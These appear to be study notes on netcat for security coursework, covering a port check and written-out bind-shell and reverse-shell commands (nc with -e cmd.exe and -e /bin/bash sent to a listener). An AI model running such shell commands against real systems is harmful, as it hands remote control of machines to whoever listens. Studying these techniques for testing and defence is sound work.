Practical Tools

Netcat

# check if a port is open
nc-n -v 10.11.0.22 110

REmote Administration With Netcat

Consider this scenario, 2 people A and B each has a computer. A has a public ip address and is directly connected to the internet (like a server), B is not (like a client), has a internal ip address.

Suppose A has a Windows Machine and B has a linux machine (demonstration only, command exactly the same).

Suppose A's public ip address is <IP-Addr>

the -e option of netcat: program to exec after connect [dangerous!!]

Netcat Bind Shell Scenario

A sends shell to B and let B control A's computer.

# A
nc -nlvp 4444 -e cmd.exe				# Listening on port 4444, run cmd.exe after connection

# B
nc -nv <IP-Addr> 4444					# B then gets the shell/cmd of A

Reverse Shell Scenario

It's called reverse because B is sharing its shell to A this time.

# A
nc -nlvp 4444							# Listening on port 4444

# B
nc -nv <IP-Addr> 4444 -e /bin/bash		# send bash shell to ip address

Practical Tools

Netcat​

REmote Administration With Netcat​

Netcat Bind Shell Scenario​

Reverse Shell Scenario​

Netcat

REmote Administration With Netcat

Netcat Bind Shell Scenario

Reverse Shell Scenario